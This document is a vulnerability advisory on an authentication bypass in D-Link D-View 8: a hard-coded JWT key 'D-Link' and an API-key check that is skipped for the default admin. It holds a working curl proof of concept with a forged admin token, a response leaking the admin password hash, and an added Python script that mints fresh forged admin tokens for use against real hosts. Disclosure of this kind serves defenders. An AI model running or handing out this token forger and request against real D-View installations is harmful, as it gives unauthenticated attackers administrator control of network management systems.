A researcher at Tenable discovered an authentication bypass vulnerability in D-Link D-View 8 v2.0.1.28.
D-View 8 signs and verifies the JWT used for user authentication with HMAC-SHA256 under a hard-coded key, the literal string D-Link, so the secret is the same on every installation:
// webApi-0.0.1-SNAPSHOT.jar!com.dlink.dview8.webapi.utils.TokenUtils
// java-jwt (com.auth0) imports used by this method:
import com.auth0.jwt.JWT;
import com.auth0.jwt.JWTVerifier;
import com.auth0.jwt.algorithms.Algorithm;
import com.auth0.jwt.interfaces.DecodedJWT;

  public static String verifyToken(String token) {
    if (Utils.isEmpty(token))
      return null; 
    // Hard-coded HMAC-SHA256 key: anyone who knows the string "D-Link"
    // can mint tokens that this verifier accepts.
    Algorithm algorithm = Algorithm.HMAC256("D-Link");
    JWTVerifier verifier = JWT.require(algorithm).build();
    DecodedJWT jwt = verifier.verify(token); // throws JWTVerificationException on a bad signature
    // Only the userId claim is returned; callers trust it as the authenticated user.
    return jwt.getClaim("userId").asString();
  }

D-View 8 also supports login with an API key, but the API key carried in the JWT (the accessToken) is never compared against anything when the user being logged in has no API key configured:
// webApi-0.0.1-SNAPSHOT.jar!com.dlink.dview8.webapi.base.shiro.WebApiRealm
      } else if (type == DViewConstant.LoginType.ApiKey) {
        String restApiKey = TokenUtils.getRestApiKey(accessToken);
        boolean isFindApiKeyToken = false;
        List<RestApiKey> apiKeys = this.restApiKeyDBService.queryRestApiKeyByUserId(userId, new String[] { "key", "status" });
        if (!Utils.isEmpty(apiKeys)) {
          for (RestApiKey apiKey : apiKeys) {
            if (restApiKey.equals(apiKey.getKey()) && apiKey.getStatus() != null && apiKey.getStatus().intValue() == 1)
              isFindApiKeyToken = true; 
          } 
          if (!isFindApiKeyToken) {
            log.error("REST API Key Token is invaild.");
            throw new UnknownAccountException("user.token.invalid");
          } 
        } 
        // No else branch: when the user has no API keys at all, the key from the
        // token is never checked and the ApiKey login proceeds.

Upon D-View 8 installation, there is no API key configured for the default user admin. In addition, the userId for the admin user appears to remain the same (59171d56-e6b4-4789-90ff-a7a27fd48548) across installations. Because the JWT signing key is the fixed string D-Link and the admin userId is predictable, an unauthenticated remote attacker can forge a JWT for the admin account with the ApiKey login type and an arbitrary key value, and use that token to call protected APIs as admin.
Proof of Concept:
curl -k -H 'Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI' 'https://<dview8-host>:17300/dview8/api/usersByLevel'
---- response ----
{
  "code" : 200,
  "value" : [ {
    "userId" : "59171d56-e6b4-4789-90ff-a7a27fd48548",
    "userName" : "admin",
    "passWord" : "JEspzb0swmH1ItPCNvMsVA==",
    "email" : " ",
    "description" : "",
    "status" : 1,
    "createTime" : 1569208381096,
    "updateTime" : 1569295082216,
    "address" : "",
    "type" : 1,
    "phone" : "",
    "nickname" : "Super Administrator",
    "logo" : "",
    "isReset" : true,
    "loginIp" : "<REDACTED>",
    "isVerifyToken" : true,
    "verifyTokenTime" : 15,
    "isEmailActivate" : false,
    "privilege" : [ {
      "id" : "728be557-1711-4f0c-98f5-2e23a1848fa3",
      "roleId" : "4c8396d1-439f-40a7-bf78-aabc1f207b4c",
      "name" : "MyOrg4",
      "children" : [ ]
    } ]
  } ],
  "success" : true
}
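As an added example (not Tenable's PoC and not D-Link's code), the following Python reimplements the token handling the advisory describes using only the standard library: forge_token mints an HS256 JWT under the static key D-Link for the admin userId, verify_token mirrors the logic of TokenUtils.verifyToken so the forgery can be checked offline, and decode_claims shows what the PoC token above actually carries. The claim layout (orgId, userId, type, key, iat, jti, nbf, exp) comes from decoding the PoC token; the placeholder orgId and key values, the assumption that type 3 selects the ApiKey login path, and the one-year lifetime are the example's own choices.

```python
"""Forge and check a D-View 8 style JWT signed with the static HS256 key.

Added example, not code from the advisory or the product. Standard library
only, so it runs offline. The claim set mirrors what the advisory's PoC token
decodes to; orgId/key are arbitrary placeholders (assumption) and type=3 is
assumed to select the ApiKey login path, as in the PoC token.
"""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Algorithm.HMAC256("D-Link") in TokenUtils.verifyToken (from the advisory)
STATIC_KEY = b"D-Link"
# userId of the default admin account, stable across installs (from the advisory)
ADMIN_USER_ID = "59171d56-e6b4-4789-90ff-a7a27fd48548"
# The token from the advisory's curl PoC, used here only to decode its claims
POC_TOKEN = (
    "eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0."
    "eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAi"
    "NTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0"
    "NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAi"
    "ZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAx"
    "ODQ0NDQ1MTk4fQ."
    "5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI"
)


def _b64url(raw: bytes) -> str:
    """JWT base64url: URL-safe alphabet, padding stripped."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def _json(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def decode_claims(token: str) -> dict:
    """Read the payload without checking the signature (inspection only)."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def forge_token(user_id: str, key: bytes = STATIC_KEY, now: Optional[int] = None,
                lifetime: int = 365 * 24 * 3600) -> str:
    """Mint an HS256 token that a verifier using the static key accepts.

    The key claim is a placeholder: the decompiled ApiKey branch skips the
    comparison entirely when the user has no API keys configured.
    """
    now = int(time.time()) if now is None else now
    header = {"alg": "HS256", "typ": "JWT"}
    claims = {
        "orgId": "00000000-0000-0000-0000-000000000000",  # placeholder (assumption)
        "userId": user_id,
        "type": 3,  # ApiKey login type, as carried by the PoC token (assumption)
        "key": "00000000-0000-0000-0000-000000000000",  # never checked for admin
        "iat": now,
        "jti": hashlib.md5(f"{user_id}{now}".encode()).hexdigest(),  # any unique id
        "nbf": now - 3600,
        "exp": now + lifetime,
    }
    signing_input = _b64url(_json(header)) + "." + _b64url(_json(claims))
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_token(token: str, key: bytes = STATIC_KEY, now: Optional[int] = None) -> Optional[str]:
    """Model of TokenUtils.verifyToken: HS256 under the static key, then exp/nbf,
    returning the userId claim, or None where the Java code would throw."""
    now = int(time.time()) if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        if header.get("alg") != "HS256":  # refuse alg confusion (none, RS256, ...)
            return None
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(payload_b64))
    except ValueError:  # bad base64, bad JSON
        return None
    if claims.get("exp") is not None and now >= claims["exp"]:
        return None
    if claims.get("nbf") is not None and now < claims["nbf"]:
        return None
    return claims.get("userId")


if __name__ == "__main__":
    print("PoC token claims:", json.dumps(decode_claims(POC_TOKEN), indent=2))
    forged = forge_token(ADMIN_USER_ID)
    print("forged token:", forged)
    print("verifies as userId:", verify_token(forged))
```

Run it directly to print the decoded PoC claims and a fresh token, then substitute that token into the Authorization header of the curl command above. The two defects are independent: a per-installation random secret would stop the forgery, but the decompiled ApiKey branch would still accept any key value for a user with no API keys configured, so both need fixing.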